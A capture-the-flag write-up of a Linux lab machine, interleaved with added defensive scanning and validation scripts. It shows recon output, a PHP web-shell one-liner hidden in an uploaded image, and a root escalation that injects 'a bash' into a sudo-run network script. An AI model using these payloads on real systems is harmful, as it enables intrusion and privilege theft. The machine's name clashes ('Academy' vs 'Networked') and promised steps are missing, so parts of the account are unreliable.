Academy is an easy-rated Linux machine from , created by guly. In this post, my IP is 10.10.14.56 and the target IP is 10.129.170.0.
There is nothing complex in the machine Networked: there is a file upload bypass leading to code execution, with many techniques available because of the lack of sanitization. Inside the machine you exploit a crontab and then a poorly configured network configuration script.
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
Local Terminal
$ ping -c 1 10.129.170.0
Pinging 10.129.170.0 with 32 bytes of data:
Reply from 10.129.170.0: bytes=32 time=180ms TTL=63
Reply from 10.129.170.0: bytes=32 time=160ms TTL=63
Reply from 10.129.170.0: bytes=32 time=165ms TTL=63
Reply from 10.129.170.0: bytes=32 time=189ms TTL=63
Ping statistics for 10.129.170.0:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 160ms, Maximum = 189ms, Average = 173ms
From the TTL of 63 we can assume it is a Linux machine.
Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.170.0
Nmap scan report for 10.129.170.0
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-06-09 10:08:48 Pacific SA Standard Time for 27s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
Raw packets sent: 131055 (5.766MB) | Rcvd: 47 (2.932KB)
Local Terminal
$ nmap -sCV -p 22,80 10.129.170.0
Nmap scan report for 10.129.170.0
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.18 seconds
Information that we have now: it's a website (port 80) that uses Apache/2.4.6,
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.170.0/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000150: 301 7 L 20 W 236 Ch "uploads"
000001612: 301 7 L 20 W 235 Ch "backup"
/uploads/ > Nothing
/backup/ > There is a file, download backup.tar, inside the .tar file you can find four files, index.php, lib.php, photos.php and upload.php
index.php > Front page
lib.php > Nothing
photos.php > photo gallery; if we can upload files, this will be useful.
upload.php > you can upload files; this is the most valuable place for now.
Reverse Shell [apache]
Go to http://10.129.170.0/upload.php and upload any image
As you can see, we can view the uploaded images; this is what we want to exploit. Intercept a file upload.
Now that we know file upload is an option, our best choice is to inject a PHP command. Add "<?php system($_GET['cmd']); ?>" on the 3rd row, or anywhere, and upload the image.
Browser > http://10.129.170.0/photos.php
Nothing there, but earlier, while fuzzing, we found an empty directory listing at /uploads/
The image is there on its own; this means we can pass commands through the 'cmd' parameter.
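The upload trick above works because the server only trusts what the file looks like, not what it contains. As an added example (not part of the write-up, and not the machine's code), here is a small POSIX sh script a defender could run over an uploads directory to flag files that carry a PHP open tag, whether or not they also start with a valid image header. The sample files it creates are constructed here; function names are this example's own.

```shell
#!/bin/sh
# Added example: scan an uploads directory for image files with embedded PHP.
# Assumes POSIX sh plus grep, od and mktemp. Sample files are constructed below.

# has_image_magic FILE: exit 0 if FILE starts with a JPEG, PNG or GIF header.
has_image_magic() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$magic" in
        ffd8ff*)  return 0 ;;   # JPEG
        89504e47) return 0 ;;   # PNG
        47494638) return 0 ;;   # GIF
        *)        return 1 ;;
    esac
}

# scan_uploads_for_php DIR: print one line per file in DIR that contains a
# PHP open tag ("<?php" or "<?="), noting whether it also has an image header.
scan_uploads_for_php() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if grep -qaE '<\?(php|=)' "$f"; then
            if has_image_magic "$f"; then
                echo "suspect: $f (valid image header, PHP inside)"
            else
                echo "suspect: $f (no image header, PHP inside)"
            fi
        fi
    done
    return 0
}

# make_sample_uploads: build a constructed uploads directory and print its path.
make_sample_uploads() {
    dir=$(mktemp -d)
    # genuine-looking JPEG: header followed by plain data
    { printf '\377\330\377\340'; printf '%s\n' 'JFIF plain picture data'; } > "$dir/good.jpg"
    # JPEG header with PHP appended, the shape of the upload used above
    { printf '\377\330\377\340'; printf '%s\n\n%s\n' 'JFIF' '<?php echo 1; ?>'; } > "$dir/polyglot.jpg"
    # PHP renamed with an image extension, no real header at all
    printf '%s\n' '<?php echo 1; ?>' > "$dir/shell.png"
    # harmless text file
    printf '%s\n' 'just a note' > "$dir/notes.txt"
    echo "$dir"
}

dir=$(make_sample_uploads)
scan_uploads_for_php "$dir"
rm -rf "$dir"
```

The scan reports polyglot.jpg and shell.png and stays quiet about good.jpg and notes.txt; the interesting case is polyglot.jpg, which passes a magic-byte check and still carries code, which is why an extension or header check alone is not enough and uploaded images should be re-encoded or stored outside the web root.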
[guly@networked ~]$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
Looks like we can execute that custom .sh file as root; let's see what's inside.
Target Terminal [guly]
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF # It writes into the network-scripts folder.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do # There is an interaction with the user
    echo "interface $var:"
    read x # We can inject a command here
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
The script writes ifcfg-guly into the network-scripts folder and then /sbin/ifup reads that file, sourcing it as shell. Because the regexp allows spaces, a value such as "a bash" passes the check and is written as NAME=a bash, so the second word is executed as a command, as root, when the file is sourced.
Target Terminal [guly]
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash #write this.
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a
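The whole privilege escalation rests on one loose regexp and an unquoted write. As an added example (not the machine's changename.sh), the script below runs the original pattern and a stricter one side by side over candidate values, and shows a writer that refuses anything with whitespace or slashes and quotes what it does write, so a sourced ifcfg file cannot turn a value into a command. Function names and the temporary output file are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the machine's own script: the value check changename.sh
# performs beside a stricter one, and a writer that refuses bad values.
# The original regexp admits spaces and slashes, so "a bash" is accepted and
# written to a file that /sbin/ifup later sources as shell code.

LOOSE_RE='^[a-zA-Z0-9_ /-]+$'    # what the original script accepts
STRICT_RE='^[a-zA-Z0-9_-]+$'     # one token: no whitespace, no slashes

# matches VALUE REGEX: exit 0 if the whole VALUE matches REGEX (POSIX ERE).
matches() {
    printf '%s\n' "$1" | grep -qE -- "$2"
}

# check_value VALUE: report "pass"/"fail" under both patterns.
check_value() {
    loose=fail; strict=fail
    matches "$1" "$LOOSE_RE" && loose=pass
    matches "$1" "$STRICT_RE" && strict=pass
    echo "loose=$loose strict=$strict"
}

# write_setting FILE VAR VALUE: append VAR="VALUE" only if VALUE passes the
# strict check. The quotes keep a sourced file from treating extra words as a
# command even if the check were ever loosened again.
write_setting() {
    file=$1; var=$2; val=$3
    if ! matches "$val" "$STRICT_RE"; then
        echo "rejected $var=$val" >&2
        return 1
    fi
    printf '%s="%s"\n' "$var" "$val" >> "$file"
}

# demo: run the checks over a normal interface name and the value used above,
# writing to a temporary file (assumption) instead of /etc/sysconfig.
demo() {
    out=$(mktemp)
    check_value 'guly0'      # loose=pass strict=pass
    check_value 'a bash'     # loose=pass strict=fail
    write_setting "$out" NAME 'guly0'
    write_setting "$out" NAME 'a bash' || true
    cat "$out"
    rm -f "$out"
}
demo
```

A value like "a bash" sails through the original pattern and is rejected by the strict one; the only line that reaches the file is NAME="guly0". The same two changes, a single-token allowlist and quoted assignments, are the fix a reviewer would ask for in a script that is allowed to run as root through sudo NOPASSWD.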